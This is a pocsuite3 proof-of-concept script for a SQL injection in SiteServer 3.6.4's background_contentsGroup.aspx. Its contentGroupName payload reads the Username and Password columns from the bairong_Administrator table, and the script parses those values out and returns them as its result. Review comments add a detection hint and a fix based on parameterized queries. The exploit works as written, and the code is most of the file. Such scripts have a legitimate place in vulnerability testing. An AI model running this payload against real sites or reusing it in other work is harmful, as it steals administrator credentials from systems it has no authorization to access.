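"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit http://pocsuite.org
"""

from urllib.parse import urlencode

from pocsuite3.api import Output, POCBase, register_poc, requests


class DemoPOC(POCBase):
    """Check for the SiteServer 3.6.4 contentGroupName SQL injection (ssvid 1150).

    The check sends a single GET request to
    /siteserver/cms/background_contentsGroup.aspx and looks for a marker
    string in the response body.

    NOTE(review): the payload shape suggests contentGroupName is concatenated
    into a SQL statement on the server; the application source is not shown
    here, so confirm before documenting the root cause. If so, the remediation
    is a parameterized query for that field.
    """

    vulID = '1150'  # ssvid
    version = '1'
    author = ['chenghs@knownsec.com']
    vulDate = '2013-12-06'
    createDate = '2013-12-14'
    updateDate = '2013-12-14'
    references = ['http://www.wooyun.org/bugs/wooyun-2013-045051']
    name = 'SiteServer 3.6.4 /siteserver/cms/background_contentsGroup.aspx SQL注入漏洞 POC'
    appPowerLink = 'http://www.siteserver.cn/'
    appName = 'SiteServer'
    appVersion = '3.6.4#'
    vulType = 'SQL Injection'
    desc = ''' SiteServer V3.6.4 application has a SQL injection vulnerability in "/siteserver/cms/background_contentsGroup.aspx",and attacker can use this to get DB infomation. '''
    samples = []
    install_requires = ['']

    def _verify(self):
        """Probe the target and report it as vulnerable when the marker is echoed.

        Returns:
            The Output object built by parse_output(): success with an
            'AdminInfo' entry when both fields were recovered from the
            response, otherwise a failure.

        NOTE(review): on success the result holds the Username and Password
        column values from [bairong_Administrator], so scan output and logs
        from this check should be stored as sensitive data.
        """
        result = {}
        # The marker is sent only as char() codes, so its literal text is not
        # part of the request; a page that merely reflects the query string
        # will not match the check below.
        # Detection hint for log review: requests to this path whose
        # contentGroupName value contains "select" and "char(".
        payload = {
            'publishmentSystemID': '1',
            'contentGroupName': "2111') and 1=(select top 1 char(116)+char(104)+char(105)+char(115)+char(95)+char(105)+char(115)+char(95)+char(110)+char(111)+char(95)+char(105)+char(110)+char(95)+char(116)+char(104)+char(105)+char(115)+char(95)+char(115)+char(101)+char(114)+char(118)+char(101)+char(114)+char(95)+char(51)+char(49)+char(55)+char(56)+char(50)+char(57)+char(56)+char(55)+char(54)+char(45)+char(45)+char(45)+char(45)+char(45)+char(45)+[Username]+char(45)+char(45)+char(45)+char(45)+char(45)+char(45)+[Password]+char(45)+char(45)+char(45)+char(45)+char(45)+char(45)+char(45)+char(57)+char(56)+char(55)+char(54)+char(95)+char(110)+char(111)+char(95)+char(104)+char(101)+char(114)+char(101) from [bairong_Administrator])) as t0--"
        }
        vulnpage = '/siteserver/cms/background_contentsGroup.aspx?'
        url = self.url + vulnpage + urlencode(payload)
        response = requests.get(url).text
        if 'this_is_no_in_this_server_317829876------' in response:
            # Fields in the echoed string are separated by runs of dashes:
            # index 1 is the Username value, index 2 the Password value.
            contentlist = response.split('------')
            # A truncated response can contain the marker but fewer than three
            # fields; without the length check the indexing below raised
            # IndexError instead of reporting a clean failure.
            if len(contentlist) > 2 and contentlist[1] and contentlist[2]:
                result['AdminInfo'] = {}
                result['AdminInfo']['Username'] = contentlist[1]
                result['AdminInfo']['Password'] = contentlist[2]
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap *result* in an Output: success when non-empty, else failure."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self):
        """Attack mode is identical to verify mode for this check."""
        return self._verify()

    def _shell(self):
        """Shell mode is not implemented."""
        pass


register_poc(DemoPOC)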
暂无官方解决方案
暂无防护方案